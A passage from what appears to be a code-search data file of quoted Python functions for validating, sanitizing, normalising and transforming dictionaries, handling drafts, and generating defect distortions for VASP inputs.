in cls.__fields__ if field.name in new_document\n ]\n unknown_fields = [\n field_name\n for field_name in new_document\n if field_name not in updated_field_names\n ]\n for unknown_field in unknown_fields:\n known_field, field_value = cls._to_known_field(\n unknown_field, new_document[unknown_field]\n )\n if known_field:\n new_document.setdefault(known_field.name, {}).update(field_value)\n elif not cls._skip_unknown_fields:\n errors.update({unknown_field: [\"Unknown field\"]})\n\n # Also ensure that primary keys will contain a valid value\n updated_fields = [\n field\n for field in cls.__fields__\n if field.name in new_document or field.is_primary_key\n ]\n for field in updated_fields:\n errors.update(field.validate_update(new_document))\n\n return errors", "def process_dict(self, dictionary):\n return self._flatten(dictionary)", "def get_draft(draft_uuid):\n assert isinstance(draft_uuid, UUID)\n try:\n data = api_request('get', api_url('drafts', str(draft_uuid)))\n except NotFound:\n raise DraftNotFound(f\"Draft does not exist: {draft_uuid}\") # lint-amnesty, pylint: disable=raise-missing-from\n return _draft_from_response(data)", "def validate(self, parameters_dict):\n return DiffParameters.schema(parameters_dict)", "def validate_insert(cls, document: dict) -> dict:\n if document is None:\n return {\"\": [\"No data provided.\"]}\n\n if not isinstance(document, dict):\n return {\"\": [\"Must be a dictionary.\"]}\n\n new_document = copy.deepcopy(document)\n\n errors = {}\n\n field_names = [field.name for field in cls.__fields__]\n unknown_fields = [\n field_name for field_name in new_document if field_name not in field_names\n ]\n for unknown_field in unknown_fields:\n known_field, field_value = cls._to_known_field(\n unknown_field, new_document[unknown_field]\n )\n if known_field:\n new_document.setdefault(known_field.name, {}).update(field_value)\n elif not cls._skip_unknown_fields:\n errors.update({unknown_field: [\"Unknown field\"]})\n\n for field in cls.__fields__:\n errors.update(field.validate_insert(new_document))\n\n return errors", "def load_transform_state_dict(self, state_dict):\n assert isinstance(self.transform_keys, list)\n assert isinstance(self.rename_transform_keys, dict)\n\n remaining = { utils.key_to_value(self.rename_transform_keys, k, False):v for k,v in state_dict.items() if k.split('.')[0] \\\n in self.transform_keys or k in self.transform_keys }\n self.load_state_dict(remaining, strict=False)\n\n return self", "def _from_dict_transform(cls: Type[TElementSubclass], data: Dict[str, Any]) -> Dict[str, Any]:\n if 'application' in data:\n data['created_by'] = data.pop('application')\n\n if 'added_timestamp' in data:\n data['created_ts'] = data.pop('added_timestamp')\n\n if 'created_ts' not in data:\n # some really old nin entries in the database have neither created_ts nor modified_ts\n data['_no_created_ts_in_db'] = True\n data['created_ts'] = datetime.fromisoformat('1900-01-01')\n\n if 'modified_ts' not in data:\n data['_no_modified_ts_in_db'] = True\n # Use created_ts as modified_ts if no explicit modified_ts was found\n data['modified_ts'] = data['created_ts']\n\n return data", "def clean_dict(d):\n\n if not isinstance(d, (dict, list)):\n return d\n if isinstance(d, list):\n return [v for v in (clean_dict(v) for v in d) if v]\n return OrderedDict([(k, v) for k, v in ((k, clean_dict(v)) for k, v in list(d.items())) if v])", "def _sanitize(data_dict):\n return data_dict", "def _from_dict_transform(cls: Type[TPrimaryElementSubclass], data: Dict[str, Any]) -> Dict[str, Any]:\n data = super()._from_dict_transform(data)\n\n if 'primary' in data:\n data['is_primary'] = data.pop('primary')\n\n return data", "def update_draft(self, kav_id, html):\n kav_api = getattr(self.api, settings.SALESFORCE_ARTICLE_TYPE)\n data = html.create_article_data()\n result = kav_api.update(kav_id, data)\n if result != HTTPStatus.NO_CONTENT:\n raise SalesforceError((\n 'Error updating draft KnowledgeArticleVersion (ID={})'\n ).format(kav_id))\n return result", "def transform_dict(dc: dict):\n tmp_dict = dict()\n for k, v in dc.items():\n k1, k2 = k.split(\"|\")\n v1 = {'e': v, 'c': k2}\n v2 = {'e': v, 'c': k1}\n insert_to_dict(tmp_dict, k1, v1)\n insert_to_dict(tmp_dict, k2, v2)\n return tmp_dict", "def _cleanse_dict(original):\n return dict((k, v) for k, v in original.items() if \"_pass\" not in k)", "def _post_draft_message(request, draft):\n if draft is None:\n draft = models.Message(\n issue_key=request.issue.key, parent=request.issue.key,\n sender=request.user.email(), draft=True)\n draft.text = request.POST.get('reviewmsg')\n draft.put()\n return HttpTextResponse(draft.text)", "def normalize_entity(in_dict):\n out_dict = in_dict.copy()\n if 'pk' in list(in_dict):\n out_dict['id'] = in_dict['pk']\n del out_dict['pk']\n if 'start_time' in list(in_dict):\n out_dict['start_time'] = \\\n datetime.strptime(in_dict['start_time'], '%Y-%m-%dT%H:%M:%S.%fZ') \\\n if out_dict['start_time'] else None\n if 'end_time' in list(in_dict):\n out_dict['end_time'] = \\\n datetime.strptime(in_dict['end_time'], '%Y-%m-%dT%H:%M:%S.%fZ') \\\n if out_dict['end_time'] else None\n if 'created_at' in list(in_dict):\n out_dict['created_at'] = datetime.strptime(in_dict['created_at'],\n '%Y-%m-%dT%H:%M:%S.%fZ')\n if 'updated_at' in list(in_dict):\n out_dict['updated_at'] = datetime.strptime(in_dict['updated_at'],\n '%Y-%m-%dT%H:%M:%S.%fZ')\n return out_dict", "def CleanUpDict(dct):\n SanityCheck.ValidateTypes(((dct, dict),))\n\n new_dct = {}\n for key in dct:\n if dct[key]:\n new_dct[key] = dct[key]\n\n return new_dct", "def edit_draft(self, message_id):\n return Draft(self, message_id).fetch()", "def from_dict(cls, word_dict):\n\n return super().from_dict(word_dict)", "def make_from_clean_dict(dict):\n household = Household()\n for k, v in dict.items():\n if k == \"head\":\n household.__setattr__(k, Member.make_from_clean_dict(v))\n elif k == \"spouse\":\n household.__setattr__(k, Member.make_from_clean_dict(v))\n elif k == \"others\":\n newvals = [Member.make_from_clean_dict(d) for d in v]\n household.__setattr__(k, newvals)\n elif k == \"address\":\n household.__setattr__(k, Address.make_from_clean_dict(v))\n elif k == \"clean_json_string\":\n pass\n else:\n household.__setattr__(k, v)\n return household", "def from_dict(cls, dikt) -> 'ComAdobeGraniteMaintenanceCrxImplRevisionCleanupTaskProperties':\n return util.deserialize_model(dikt, cls)", "def sanitize(object: dict, regex: re.Pattern = (\n re.compile(r\"(?<!(?P<bound><)\\W)\\b(?P<word>\\w+)\\b(?(bound)(?!>)|)\")\n), placeholder: str = \"<obscured>\") -> dict:\n\n result = dict()\n\n # import json; print(json.dumps(object, indent=4))\n\n for key, value in object.items():\n\n if isinstance(value, dict):\n value = sanitize(value)\n\n if key in (\n \"enterprise_name\", \"email\", \"name\", \"name_normalized\",\n \"real_name\", \"real_name_normalized\", \"display_name\",\n \"display_name_normalized\", \"title\", \"phone\", \"skype\",\n \"first_name\", \"last_name\"\n ):\n value = placeholder if value else None\n\n if key.startswith((\"image\", \"status\")) or key == \"blocks\":\n continue # message blocks are too complex to sanitize, drop them\n\n if key in (\"topic\", \"purpose\"):\n if isinstance(value, dict):\n value.update(value=placeholder)\n elif isinstance(value, str):\n value = placeholder\n if key == \"previous_names\":\n value = [placeholder] * len(value)\n\n if key == \"text\":\n value = re.sub(regex, lambda match: (\n \"X\" * len(match[\"word\"])), value)\n\n if key in (\"files\", \"attachments\"):\n key, value = f\"{key}_count\", len(value)\n\n result[key] = value\n\n return result", "def _cleanse_dict(original):\n return {k: v for k, v in original.items() if \"_pass\" not in k}", "def get_draft_revisions(self, object_id):\n content_type = ContentType.objects.get_for_model(self.model)\n return Revision.objects.filter(\n version__object_id=object_id, \n version__content_type=content_type,\n easypublishermetadata__status='draft',\n easypublishermetadata__language=get_language()\n ).select_related().distinct()", "def collect_draft_pick(team_dict):\n team_dict['draft_pick'] = []\n pick_list = DraftPick.objects.filter(owner=team_dict['team'].franchise.id,\n year=team_dict['team'].year)\n for p in pick_list:\n number = ((p.round - 1) * 16) + p.order\n dft_pick = {\n 'pick': p,\n 'number': number,\n }\n team_dict['draft_pick'].append(dft_pick)\n return team_dict", "def denormalize_entity(in_dict):\n out_dict = in_dict.copy()\n if 'id' in list(in_dict):\n out_dict['pk'] = in_dict['id']\n del out_dict['id']\n if 'start_time' in list(in_dict):\n # if not a datetime object, throw error\n if in_dict['start_time'] and not isinstance(in_dict['start_time'],\n datetime):\n raise IncorrectType()\n out_dict['start_time'] = \\\n in_dict['start_time'].strftime('%Y-%m-%dT%H:%M:%S.%fZ') \\\n if in_dict['start_time'] else None\n if 'end_time' in list(in_dict):\n # if not a datetime object, throw error\n if in_dict['end_time'] and not isinstance(in_dict['end_time'],\n datetime):\n raise IncorrectType()\n out_dict['end_time'] = \\\n in_dict['end_time'].strftime('%Y-%m-%dT%H:%M:%S.%fZ') \\\n if in_dict['end_time'] else None\n if 'created_at' in list(in_dict):\n # if not a datetime object, throw error\n if not isinstance(in_dict['created_at'], datetime):\n raise IncorrectType()\n out_dict['created_at'] = in_dict['created_at'].strftime(\n '%Y-%m-%dT%H:%M:%S.%fZ')\n if 'updated_at' in list(in_dict):\n # if not a datetime object, throw error\n if not isinstance(in_dict['updated_at'], datetime):\n raise IncorrectType()\n out_dict['updated_at'] = in_dict['updated_at'].strftime(\n '%Y-%m-%dT%H:%M:%S.%fZ')\n return out_dict", "def format_dict(\n d: typing.Mapping[TTextType, TTextType]\n) -> typing.Iterator[TViewLine]:\n\n return format_pairs(d.items())", "def put(self, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n self.validate_input(d, draft_id)\n self.process_input(d, draft_id)\n d.save()", "def from_dict(cls, dictionary):\n normalised = cls.normalise_dict(dictionary)\n return cls.from_normalised_dict(normalised)", "def patch(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('patch',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def get_draft_by_id(request, draft_id):\n\n for draft in request.session[\"drafts\"]:\n if draft[\"id\"] == draft_id:\n # Found a valid draft, return it\n return draft\n\n return None # Otherwise return None.", "def from_dict(cls, dikt) -> 'PartialDifferenceQuotientInput':\n return util.deserialize_model(dikt, cls)", "def _render_dict(input_dict: Dict[str, Any]) -> Dict[str, Any]:\n output_dict = {}\n\n for key, value in input_dict.items():\n if isinstance(value, str):\n new_value = string.Template(value).substitute(_mapping)\n output_dict[key] = new_value\n elif isinstance(value, dict):\n output_dict[key] = _render_dict(value) # type: ignore\n else:\n output_dict[key] = value\n\n return output_dict", "def from_dict(cls, dikt) -> 'Debt':\n return util.deserialize_model(dikt, cls)", "def drafts(self):\n if self._drafts is None:\n if self._initialize_drafts():\n self._save_drafts()\n return self._drafts", "def __cleanState__(self, stateDict):\n for k in list(stateDict.keys()):\n if k.startswith('_'):\n stateDict.pop(k)\n return stateDict", "def normalise_dict(dictionary):\n # Convert all keys to lowercase (so that we can check if certain keys exist)\n # Values are left untouched until the object is constructed (e.g. in case of None)\n dictionary = {key.lower(): value for key, value in dictionary.items()}\n # Find the cvarsort\n try:\n dictionary['cvarsort'] = dictionary['cvarsort'].lower()\n except KeyError:\n raise PydmrsValueError('Sortinfo must have cvarsort')\n # Correct cvarsort if features are evidence for 'x' or 'e':\n if dictionary['cvarsort'] not in 'ex' and len(dictionary) > 1:\n if any(key in dictionary for key in EventSortinfo.features): # event evidence\n dictionary['cvarsort'] = 'e'\n elif any(key in dictionary for key in InstanceSortinfo.features): # instance evidence\n dictionary['cvarsort'] = 'x'\n return dictionary", "def parse(self) -> Dictionary:\n self.parsed_dictionary = dictionary = Dictionary()\n state = State.pre_signature\n for lineno, line in self.line_iter:\n lineno += 1\n line = decomment_and_normalize(line)\n if line == \"\": continue\n parsed = False\n expected_lines = State.expected_lines(state)\n for t in expected_lines:\n parsed, state = t.parse_line(state, dictionary, line, lineno)\n if parsed: break\n if not parsed:\n raise DictionaryParseError(lineno, expected_lines, self.source)\n if State.is_not_final(state):\n raise DictionaryParseError(lineno + 1, expected_lines, self.source)\n try:\n del dictionary._last_article\n del dictionary._last_definition\n del dictionary._last_example\n del dictionary._last_idiom\n except AttributeError:\n pass\n return dictionary", "def post(self):\n try:\n draft_project_dto = DraftProjectDTO(request.get_json())\n draft_project_dto.user_id = token_auth.current_user()\n draft_project_dto.validate()\n except DataError as e:\n current_app.logger.error(f\"error validating request: {str(e)}\")\n return {\"Error\": \"Unable to create project\", \"SubCode\": \"InvalidData\"}, 400\n\n try:\n draft_project_id = ProjectAdminService.create_draft_project(\n draft_project_dto\n )\n return {\"projectId\": draft_project_id}, 201\n except ProjectAdminServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n except (InvalidGeoJson, InvalidData) as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def validate(self, data):\n draft_group_id = data['draft_group']\n if draft_group_id is None:\n raise serializers.ValidationError(\"invalid draft_group id\")\n try:\n draftgroup.models.DraftGroup.objects.get(pk=draft_group_id)\n except draftgroup.models.DraftGroup.DoesNotExist:\n raise serializers.ValidationError('invalid draft_group id')\n\n return data", "def _dictRoundTripNormalize(self, treedict):\n for key, value in list(treedict.items()):\n if isinstance(value, dict):\n self._dictRoundTripNormalize(value)\n\n # Expand treedict[(\"group\", \"attr_name\")]\n # to treedict[\"group\"][\"attr_name\"]\n for key, value in list(treedict.items()):\n if not isinstance(key, tuple):\n continue\n # Put the attribute inside the group\n grpname, attr = key\n if not grpname:\n continue\n group = treedict.setdefault(grpname, dict())\n if isinstance(group, dict):\n del treedict[key]\n group[(\"\", attr)] = value", "def create_deltas(self, tensor_dict):\n\n if not self.send_model_deltas:\n raise ValueError(\"Should not be creating deltas when not sending deltas.\")\n base_tensors = self.base_for_deltas[\"tensor_dict\"]\n base_version = self.base_for_deltas[\"version\"]\n if base_tensors is None:\n raise ValueError(\"Attempting to create deltas when no base tensors are known.\")\n elif set(base_tensors.keys()) != set(tensor_dict.keys()):\n raise ValueError(\"Attempting to convert to deltas when base tensor names do not match ones to convert.\")\n else:\n deltas = {\"tensor_dict\": {key: (tensor_dict[key] - base_tensors[key]) for key in base_tensors},\n \"delta_from_version\": base_version}\n return deltas", "def from_dict_dict(cls, dict_dict):\n return {k: cls.from_dict(v) for k, v in dict_dict.items()}", "def original_dict(self):\n return self.obj.__dict__", "def get(self,\n draft_id,\n ):\n return self._invoke('get',\n {\n 'draft_id': draft_id,\n })", "def safe_dict(d: dict) -> dict:\n return {k: v for k, v in d.items() if not any(chunk in k for chunk in [\"token\"])}", "def get_or_create_bundle_draft(bundle_uuid, draft_name):\n bundle = get_bundle(bundle_uuid)\n try:\n return get_draft(bundle.drafts[draft_name]) # pylint: disable=unsubscriptable-object\n except KeyError:\n # The draft doesn't exist yet, so create it:\n response = api_request('post', api_url('drafts'), json={\n \"bundle_uuid\": str(bundle_uuid),\n \"name\": draft_name,\n })\n # The result of creating a draft doesn't include all the fields we want, so retrieve it now:\n return get_draft(UUID(response[\"uuid\"]))", "def from_dict(cls, d):\n return cls(d[\"sequence\"], immutable_bounds=d[\"immutable_bounds\"])", "def _to_save_dict(self, d: dict) -> dict:\n return _to_save_dict(d)", "def upgrade_state_dict(self, state_dict):\n return state_dict", "def upgrade_state_dict(self, state_dict):\n return state_dict", "def normalise_workflow(workflow_dict):\n normalise_process(workflow_dict)\n if not 'steps' in workflow_dict:\n exit_perm_fail(\"No steps in Workflow\")\n\n if isinstance(workflow_dict['steps'], dict):\n new_steps = []\n for step_id, step in workflow_dict['steps'].items():\n step['id'] = step_id\n new_steps.append(step)\n workflow_dict['steps'] = new_steps\n\n for step in workflow_dict['steps']:\n if 'in' in step:\n if isinstance(step['in'], dict):\n new_in = []\n for key, value in step['in'].items():\n if isinstance(value, str):\n new_in.append({'id': key, 'source': value})\n elif isinstance(value, dict):\n value['id'] = key\n new_in.append(value)\n step['in'] = new_in\n\n if 'out' in step:\n if not isinstance(step['out'], list):\n exit_perm_fail(\"The out attribute of a workflow step must be an array\")\n for i, output in enumerate(step['out']):\n if isinstance(output, str):\n step['out'][i] = {'id': output}", "def _get_draft_message(draft):\n return HttpTextResponse(draft.text if draft else '')", "def from_dict(cls, dikt) -> 'Body':\n return util.deserialize_model(dikt, cls)", "def get_safe_dict(target: dict) -> dict:\n return_value = {}\n for k in target:\n return_value[k] = cleanse_value(k, target.get(k))\n return return_value", "def convert_to_pydantic(dict_object: Dict) -> ConversationIDModel:\n return ConversationIDModel.parse_obj(dict_object)", "def from_dict(cls, dikt) -> 'CardholderData':\n return util.deserialize_model(dikt, cls)", "def from_dict(cls, dikt) -> 'Body':\n return deserialize_model(dikt, cls)", "def deep_normalize(d):\n if 'sudsobject' in str(d.__class__):\n d = deep_normalize(dict(d))\n elif isinstance(d, dict):\n for k,v in d.iteritems():\n if 'sudsobject' in str(v.__class__):\n #print k, v, '%s' % v.__class__\n r = deep_normalize(dict(v))\n d[k] = r\n elif isinstance(v, dict):\n r = deep_normalize(v)\n d[k] = r\n elif isinstance(v, (list, tuple, )):\n d[k] = [deep_normalize(i) for i in v]\n elif isinstance(v, datetime):\n # per problemi di permessi sugli oggetti datetime trasformo\n # in DateTime di Zope\n d[k] = DateTime(v.isoformat())\n elif isinstance(d, (list, tuple, )):\n d = [deep_normalize(i) for i in d]\n\n return d", "def transform(dict_: dict, typed_dict: dict, substring_to_type: Optional[List] = None) -> dict:\n\n if substring_to_type:\n for item in substring_to_type:\n # Initialize substring values to convert into dictionary type\n substring = item['substring']\n field = item['field']\n type_ = item['type']\n\n # Find keys that match the substring and pull them into a new dictionary\n sub_dict = dict((key.strip(substring), dict_.pop(key))\n for key in set(dict_.keys()) if substring in key)\n\n # Transform the dictionary into the dictionary type provided\n dict_[field] = transform(sub_dict, type_)\n\n fields = typed_dict.__annotations__\n return {name: fields[name](value) for name, value in dict_.items() if name in fields.keys()}", "def copy_dict(source_dict, diffs):\n result = dict(source_dict)\n result.update(diffs)\n return result", "def form_valid(self, form):\n\n draft_pk = self.request.POST.get(\"pub_draft_pk\", \"\")\n publishing_draft = draft_pk.isdigit()\n\n if (not publishing_draft) and (self.topic.exists and self.topic.is_banned):\n # Cannot check is_banned before checking its existence.\n notifications.error(self.request, _(\"we couldn't handle your request. try again later.\"))\n return self.form_invalid(form)\n\n status = self.request.user.entry_publishable_status\n\n if status is not None:\n notifications.error(self.request, status, extra_tags=\"persistent\")\n if publishing_draft:\n return redirect(reverse(\"entry_update\", kwargs={\"pk\": int(draft_pk)}))\n return self.form_invalid(form)\n\n if publishing_draft:\n try:\n entry = Entry.objects_all.get(\n pk=int(draft_pk), is_draft=True, author=self.request.user, topic__is_banned=False\n )\n entry.content = form.cleaned_data[\"content\"]\n entry.is_draft = False\n entry.date_created = timezone.now()\n entry.date_edited = None\n except Entry.DoesNotExist:\n notifications.error(self.request, _(\"we couldn't handle your request. try again later.\"))\n return self.form_invalid(form)\n else:\n # Creating a brand new entry.\n entry = form.save(commit=False)\n entry.author = self.request.user\n\n if self.topic.exists:\n entry.topic = self.topic\n else:\n if not self.topic.valid:\n notifications.error(self.request, _(\"curses to such a topic anyway.\"), extra_tags=\"persistent\")\n return self.form_invalid(form)\n\n entry.topic = Topic.objects.create_topic(title=self.topic.title)\n\n entry.save()\n notifications.info(self.request, _(\"the entry was successfully launched into stratosphere\"))\n return redirect(reverse(\"entry-permalink\", kwargs={\"entry_id\": entry.id}))", "def get_draft(self, draft_number: Optional[int] = None) -> Draft:\n if draft_number is None:\n self._status.check_authority_for_draft()\n draft_number = self._status.draft_number\n\n if not draft_number:\n raise TypeError(\"The given draft number is illegal\")\n\n for draft in self.list_drafts():\n if draft_number == draft.number:\n return draft\n\n raise ResourceNotExistError(resource=\"draft\", identification=draft_number)", "def update(cls, dto: dict):\n entity = cls.from_dict(dto)\n try:\n valid_entity = cls.find_by_id(dto[\"id\"])\n except KeyError as e:\n raise AppException(\"Can't find key {}\".format(e))\n\n if not valid_entity:\n return None\n\n # validate creation your creation.\n entity.creation_validation()\n\n # Copy all attributes from entity to valid_entity.\n valid_entity << entity\n\n return valid_entity", "def test_sanitize() -> None:\n # a test dict with many embedded numbered list\n # but also an already existing list\n test = {\n \"a\": {\"0\": \"b\", \"1\": \"c\"},\n \"d\": {\"e\": {\"0\": \"f\", \"1\": \"g\"}, \"h\": \"i\"},\n \"j\": [\"k\", \"l\"],\n }\n\n # the sanitize version of this\n result = {\n \"a\": [\"b\", \"c\"],\n \"d\": {\"e\": [\"f\", \"g\"], \"h\": \"i\"},\n \"j\": [\"k\", \"l\"],\n }\n\n assert Translator.sanitize(test) == result\n\n return", "def TranslateDict(d):\n\n return dict(TranslateKeyValue(k, v) for k, v in d.iteritems())", "def convert_to_pydantic(dict_object: Dict) -> MessageModel:\n return MessageModel.parse_obj(dict_object)", "def convert_to_pydantic(dict_object: Dict) -> MessageModel:\n return MessageModel.parse_obj(dict_object)", "def validate_dict(data_dict, entity):\r\n fields = []\r\n for key, value in data_dict.items():\r\n if not value:\r\n fields.append(key)\r\n continue\r\n if len(fields) > 0:\r\n return provide_field_value(entity, fields)\r\n elif key == hqAddKey:\r\n status = validate_hqadd(value)\r\n if not status == ok_str:\r\n return status\r\n elif key == logoUrlKey:\r\n status = validate_logourl(value)\r\n if not status == ok_str:\r\n return status\r\n elif key == type_key:\r\n status = validate_officeType(value)\r\n if not status == ok_str:\r\n return status\r\n elif key == name_key:\r\n status = None\r\n if entity == party_key:\r\n status = validate_partyname(value)\r\n elif entity == office_key:\r\n status = validate_officeName(value)\r\n if not status == ok_str:\r\n return status\r\n if fields:\r\n return provide_field_value(entity, fields)\r\n return ok_str", "def safe_dict(d):\r\n if isinstance(d, dict):\r\n return dict([(k.encode('utf-8'), safe_dict(v)) for k, v in d.iteritems()])\r\n elif isinstance(d, list):\r\n return [safe_dict(x) for x in d]\r\n else:\r\n return d", "def _check_typed_dict(self) -> PossibleResult[T]:\n # pylint: disable=unidiomatic-typecheck\n if type(self.constructor) == _TypedDictMeta:\n # pylint: enable=unidiomatic-typecheck\n if not isinstance(self.obj, dict):\n raise DeserializeError(\n dict, self.obj, self.new_depth, self.key\n )\n return {\n name: Deserialize(\n obj=self.obj.get(name, UNDEFINED),\n constructor=_type,\n depth=self.new_depth,\n convert_primitives=self.convert_primitives,\n key=name,\n ).run()\n for name, _type in get_type_hints(self.constructor).items()\n } # type: ignore\n return NO_RESULT", "def _flatten_dict(self, d: Mapping[str, Any]) -> Dict[str, Any]:\n nested = {k for k, v in d.items() if isinstance(v, (Mapping, Configuration))}\n if self._lowercase:\n result = {\n k.lower() + \".\" + ki: vi\n for k in nested\n for ki, vi in self._flatten_dict(d[k]).items()\n }\n result.update(\n (k.lower(), v)\n for k, v in d.items()\n if not isinstance(v, (Mapping, Configuration))\n )\n else:\n result = {\n k + \".\" + ki: vi\n for k in nested\n for ki, vi in self._flatten_dict(d[k]).items()\n }\n result.update(\n (k, v)\n for k, v in d.items()\n if not isinstance(v, (Mapping, Configuration))\n )\n return result", "def clean_dict(target_dict, whitelist=None):\n assert isinstance(target_dict, dict)\n return {\n ustr(k).strip(): ustr(v).strip()\n for k, v in target_dict.items()\n if v not in (None, Ellipsis, [], (), \"\")\n and (not whitelist or k in whitelist)\n }", "def get_latest_draft(self, object_id):\n latest_revision = self.get_latest_draft_revision(object_id)\n return latest_revision", "def update(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('update',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def from_dict(cls, d):\n s = cls()\n s.update_from_dict(d)\n return s", "def from_dict(cls, dikt) -> 'BaseEventBody':\n return util.deserialize_model(dikt, cls)", "def apply_RBDM_defect_dict(defects_dict: dict, \r\n valences_oxi_states: dict, \r\n incar_settings: dict = default_incar_settings, \r\n dict_number_electrons_user : dict = None,\r\n bdm_increment: float = 0.1,\r\n bdm_distortions: list = None,\r\n std_dev: float = 0.25,\r\n distorted_elements: dict = None,\r\n bdm_type: str= \"BDM\",\r\n potcar_settings: dict = None,\r\n write_files: bool = True,\r\n verbose: bool = False,\r\n ):\r\n vasp_defect_inputs = vasp_input.prepare_vasp_defect_inputs(deepcopy(defects_dict))\r\n dict_defects = {} # dict to store BDM distortions for all defects\r\n if not bdm_distortions:\r\n bdm_distortions = list(np.around(np.arange(-0.6, 0.601, bdm_increment), decimals=3)) #[i/100 for i in range(-60, 60.1, int(bdm_increment*100) ]\r\n bdm_metadata = {\"BDM_parameters\": {\"BDM_increment\": bdm_increment,\r\n \"BDM_distortions\": bdm_distortions,\r\n \"rattle_std_dev\": std_dev},\r\n \"defects\": {},\r\n } # dict with BDM parameters, useful for posterior analysis\r\n \r\n print(f\"Applying BDM... Will rattle with std dev of {std_dev} A \\n\")\r\n \r\n for defect_type in list(defects_dict.keys()): # loop for vacancies, antisites, interstitials\r\n for defect in defects_dict[defect_type]: # loop for each defect in dict\r\n \r\n defect_name = defect[\"name\"] # name without charge state\r\n bulk_supercell_site = defect[\"bulk_supercell_site\"]\r\n if distorted_elements: # read the elements to distort\r\n try:\r\n distorted_element = distorted_elements[defect_name]\r\n except KeyError:\r\n print(f\"Problem reading the keys in distorted_elements. Are they the correct defect names (without charge states)?\")\r\n distorted_element = None\r\n else: \r\n distorted_element = None\r\n \r\n if not dict_number_electrons_user : # if not given, BDM will calculate the number of extra/missing e- of defect\r\n number_electrons = calc_number_electrons(defect, valences_oxi_states) \r\n else:\r\n number_electrons = dict_number_electrons_user[defect_name]\r\n \r\n dict_defects[defect_name] = {}\r\n bdm_metadata[\"defects\"][defect_name] = {\"unique_site\" : list(bulk_supercell_site.frac_coords), \r\n \"charges\": {},\r\n }\r\n \r\n print(\"\\nDefect:\", defect_name)\r\n if number_electrons < 0 :\r\n print(f\"Number of extra electrons in neutral state: {number_electrons}\")\r\n elif number_electrons >= 0 :\r\n print(f\"Number of missing electrons in neutral state: {number_electrons}\")\r\n \r\n for charge in defect[\"charges\"]:\r\n \r\n poscar_comment = vasp_defect_inputs[f\"{defect_name}_{charge}\"][\"POSCAR Comment\"]\r\n charged_defect = {}\r\n \r\n # Entry for the unperturbed defect to compare\r\n charged_defect[\"Unperturbed_Defect\"] = deepcopy(vasp_defect_inputs[f\"{defect_name}_{charge}\"])\r\n \r\n # Generate perturbed structures\r\n # Calculate extra/missing e- accounting for the charge state of the defect \r\n num_electrons_charged_defect = number_electrons + charge # negative if extra e-, positive if missing e-\r\n num_nearest_neighbours = calc_number_neighbours(num_electrons_charged_defect) # Number of distorted neighbours for each charge state\r\n \r\n \r\n print(f\"\\nDefect {defect_name} in charge state: {charge}. Number of distorted neighbours: {num_nearest_neighbours}\")\r\n distorted_structures = apply_distortions(defect, \r\n num_nearest_neighbours, \r\n bdm_distortions,\r\n std_dev,\r\n distorted_element,\r\n verbose = verbose,\r\n )\r\n bdm_metadata[\"defects\"][defect_name][\"defect_index\"] = distorted_structures[\"BDM_parameters\"][\"defect_index\"] # store site number of defect\r\n bdm_metadata[\"defects\"][defect_name][\"charges\"].update({int(charge): \r\n {\"number_neighbours\": num_nearest_neighbours,\r\n \"distorted_atoms\" : distorted_structures[\"BDM_parameters\"][\"distorted_atoms\"],\r\n } \r\n } \r\n ) # store BDM parameters used for latter analysis\r\n \r\n \r\n for key_distortion, struct in distorted_structures[\"Distortions\"].items():\r\n poscar_comment = key_distortion.split(\"Distortion\")[0] + \"_\" + vasp_defect_inputs[f\"{defect_name}_{charge}\"][\"POSCAR Comment\"] + \"__num_neighbours=\" + str(num_nearest_neighbours)\r\n charged_defect[key_distortion] = update_struct_defect_dict(vasp_defect_inputs[f\"{defect_name}_{charge}\"],\r\n struct, \r\n poscar_comment,\r\n )\r\n \r\n dict_defects[defect_name][f\"{defect_name}_{charge}\"] = charged_defect # add charged defect entry to dict\r\n if write_files :\r\n create_vasp_input( f\"{defect_name}_{charge}\", \r\n charged_defect, \r\n incar_settings = incar_settings,\r\n potcar_settings = potcar_settings,\r\n bdm_type = bdm_type,\r\n )\r\n print() \r\n if verbose: print(\"________________________________________________________\") # output easier to read\r\n \r\n with open('BDM_metadata.json', 'w') as convert_file:\r\n convert_file.write(json.dumps(bdm_metadata))\r\n return dict_defects", "def wrap_draft(item):\r\n setattr(item, 'is_draft', item.location.revision == DRAFT)\r\n item.location = item.location.replace(revision=None)\r\n return item", "def update_workflow_from_dict(\n self,\n workflow_dict,\n workflow_id=None,\n validate=True\n ):\n valid_def = {}\n if validate:\n valid_def = Definition.validate_workflow(workflow_dict)\n if valid_def is False:\n Log.an().error(\n 'invalid workflow:\\n%s', yaml.dump(workflow_dict)\n )\n return False\n\n else:\n valid_def = workflow_dict\n\n # insert workflow_id into dict if provided\n if workflow_id:\n valid_def['workflow_id'] = workflow_id\n\n # make sure steps of workflow are valid, update app IDs\n if not self.synchronize_workflow_with_db(valid_def):\n Log.an().error(\n 'cannot synchronize workflow with data source: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # update workflow record\n if not self.update_workflow(\n valid_def['workflow_id'],\n {\n 'name': valid_def['name'],\n 'description': valid_def['description'],\n 'username': valid_def['username'],\n 'git': valid_def['git'],\n 'inputs': json.dumps(valid_def['inputs']),\n 'parameters': json.dumps(valid_def['parameters']),\n 'final_output': json.dumps(valid_def['final_output']),\n 'apps': json.dumps(valid_def['apps']),\n 'public': valid_def['public'],\n 'enable': valid_def['enable'],\n 'test': valid_def['test'],\n 'version': valid_def['version']\n }\n ):\n Log.an().error(\n 'cannot update workflow: workflow_id=%s',\n valid_def['workflow_id']\n )\n return False\n\n # update steps, create map of steps\n step_name2id = self.update_workflow_steps_from_dict(valid_def)\n if not step_name2id:\n Log.an().error(\n 'cannot update workflow steps: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # delete dependencies\n if not self.delete_depend_by_workflow_id(valid_def['workflow_id']):\n Log.an().error(\n 'cannot delete step dependencies for workflow: workflow_id=%s',\n valid_def['workflow_id']\n )\n return False\n\n # insert dependency records\n if not self.import_step_depends_from_dict(valid_def, step_name2id):\n Log.an().error(\n 'cannot import step dependencies for workflow: workflow_id=%s',\n valid_def['workflow_id']\n )\n return False\n\n return True", "def from_dict(cls, 